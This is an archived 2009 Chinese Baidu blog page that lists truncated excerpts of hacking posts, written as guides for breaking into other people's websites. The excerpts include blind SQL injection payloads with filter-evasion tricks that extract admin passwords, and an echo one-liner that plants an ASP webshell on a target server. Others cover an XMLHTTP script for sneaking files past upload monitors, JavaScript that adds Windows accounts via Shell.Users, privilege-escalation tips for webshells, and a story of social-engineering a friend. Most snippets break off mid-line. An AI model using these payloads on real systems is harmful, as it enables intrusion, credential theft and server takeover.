小新's Blog
百度空间 | 百度首页 
               
 
关于我
 

论装逼

1、装逼之人必有牛逼之处,正如可怜之人必有可恨之处。

2、如果你第一波装的很成功的话,以后的就很自然了。即使不装,他们也会自然而然的认为你的确很牛逼。

3、遇见装逼者,你必须装的比他们更牛逼,遇强愈强。骗了一个人,你是骗子;骗了一个地方的人,你是成功人士;骗了一个国家,你就是领袖;骗了整个世界,你就是上帝!

4、装逼是不会被雷劈的,因为到处都有避雷针。

   
 
文章列表
 
2009-07-08 18:27

<?php
$admin['pass'] = "admin"; //设置密码
$notice = "<FONT color=#ff3300>目录:
 
2009-07-08 14:53

浏览器可以浏览网页,可以查看图片、视频,可以保存图片等等功能,但你可能没有想到或没有见到过下面这个功能:访问的页面中包含的图片元素围绕在一起有规律的旋转 !

这是如何实现的呢?首先随便打开一个网站,随便一个网站都行!然后复制下面的代码到地址栏中,回车确定,看看发生了什么?
下面是代码!
复制内容到剪贴板代码:


javascript:R=0; x1=.1; y1=.05; x2=.25; y2=.24; x3=1.6; y3=.24; x4=300; y4=200; x5=300; y5=200; DI=document.images; DIL=DI.length;

 
2009-07-07 14:09

经常在一些BBS里和一些杂志里看到,渗透XX网站,其实就是拿了扔了一个WEBSHELL在上面,严格来说这根本算不上渗透。因为当你进了XX内网面对N多的机器的时候,才知道,内网是多么的庞大。下面我们先来看两张内网的拓扑结构图12所示。

 
2009-07-07 13:25

作者:樱花浪子
本文已发表黑客手册,转载请注名版权                

  时间过的真快,记得在07年1月份我写过一篇关于跨站添加管理员的文章,上期又给大家带来一期跨站的文章,小天对我那句话比较赞同,跨站的威力是不比注入小的,注入如果遇见SQL数据库还好说,
ACC的也就能老老实实猜密码,进后台,在利用后台某个功能得

 
2009-07-07 13:23

举个例 子说一下,我们得到一个注入点:jmdcw.asp?name=aa'and 1=1 and ''=',如果替换其中的1=1为查询管理员的密码的语句:


(select asc(mid(pass,1,1)) from [name] where id=1)>49

如何用空格呢?其实可以写成这样的:

jmdcw.asp?name=aa'and((select(asc(mid(pass,1,1)))from[name]where(id=1))>49)and''='


如果屏蔽了<和>符号,则用between…and…,语句是:


jmdcw.asp?name=aa'and((select(asc(mid(pass,1,1)))from[name]where(id=1))between(40)and(50))a

 
2009-07-07 13:19
数据库这玩意谁不知道?只要是站长或玩黑的都清楚不过了,一旦被某Y下载了,那可不是闹着玩的。(片头语)
看了7月的X档案的一篇数据库防下载新招之“#%”一文,貌似作者讲的有问题。纯属个人见解..
作者用的是Z-Blog做的测试环境。
作者用了几种组合,如:#%test.mdb、%23%23test.mdb、%23#test.mdb和##test.mdb
作者也逐一下载测试下,当作者测试到#%23test.mdb时,出现了以下页面。

 
2009-07-07 13:11

在我们入侵网站的过程中,有时候提交我们的大马或者其他ASP文件的时候,会被一流信息监控系统所拦截,这是因为它设置了限制提交字符,既然它不允许我们进行提交,那我们可以采用下载的方法.这个就好比我们上传大EXE文件的时候,网站禁止了上传,但是我们可以采用外部下载的方式来把目标文件下载到本地服务器中.好了,这个方法就是,只要服务器没有禁用XML和数据流组件,我们可以往服务器中提交以下ASP脚本文件
<%
Set xPost = CreateObject("Microsoft.XMLHTTP")
xPost.Open "GET","

 
2009-07-07 13:08

在旁注过程中,可以执行cmd而权限又比较低的情况下,有时候可以用这个方法帮你拿下目标站。
命令格式
Echo 语句 >目标站绝对目录
例如:
echo ^<^%execute request("0")^%^> >D:\03389.com\wwwroot\YingMu.asp

这样访问目标站的目录下就会生成一个密码为0的asp的一句话,此方法在PHP等脚本语言均适用,大家灵活发挥

 
2009-07-06 08:38
lcx和剑心等大牛在06年的时候就已经在用这种语法了,而我等小辈到最近才领略到,惭愧惭愧......

手头暂时没有注入点测试,就先以我机器上的MSSQL做实验吧。
下面的语句我直接写完整的SQL语句,注入的时候稍微改改就能用了,呵呵。

假如现在有个注入点,所查询表的结构如下图:

 
2009-07-06 08:33

 
2009-07-06 07:43

在一个风高黑夜的晚上

我突然想找几个小站练手

于是发生了以下对话

小新:丢几个网站给我。

尧子哥:什么网站。

小新:我练手。

然后尧子哥都不叼我了

我等了半天看他没反应,于是我就我准备小社工一把的!

小新:我拿你练手。

尧子哥:死开。

于是开始收集他的资料,请出百度大叔(

 
2009-07-03 17:52
今天研究了一下用户控制面板文件nusrmgr.cpl,发现调用的是Shell.Users来加用户,它还同时调用了 wscript.shell、Shell.Application、Shell.LocalMachine这三个组件。不过加用户的话,这一个 Shell.Users就足够了。那么可能在删掉了net.exe和不用adsi之外,这也可能是一种新的加用户的方法。代码如下:


js:

var o=new ActiveXObject( "Shell.Users" );
z=o.create("test") ;
z.changePassword("123456","")
z.setting(
 
2009-07-03 09:18

社会工程学

  什么是社会工程学?
  定义:社会工程学是关于建立理论通过自然的、社会的和制度上的途径并特别强调根据现实的双向计划和设计经验来一步一步地
 
2009-07-03 03:22

双人舞

无重力

 
2009-07-02 15:21

在得到暸一個Webshell之後,如果能進一步利用系統的配置不當取得更高的權限,一直是廣大黑友們所津津樂道的話題,也是高手和菜鳥間最大的區別。本文將從一個大角度總括當前流行的各種提權方法,希望對大家有所啓發,起到一個抛磚引玉的作用

WEBSHELL權限提升技巧
c: d: e:.....
C:\Documents and Settings\All Users\「開始」菜單\程序\
看這裏能不能跳轉,我們從這裏可以獲取好多有用的信息比如Serv-U的路徑,
C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\

 
     
 
 
日历
 
     
 
背景音乐
 
 
文章分类
 
 
 
 
 
 
 
 
 
 
     


©2009 Baidu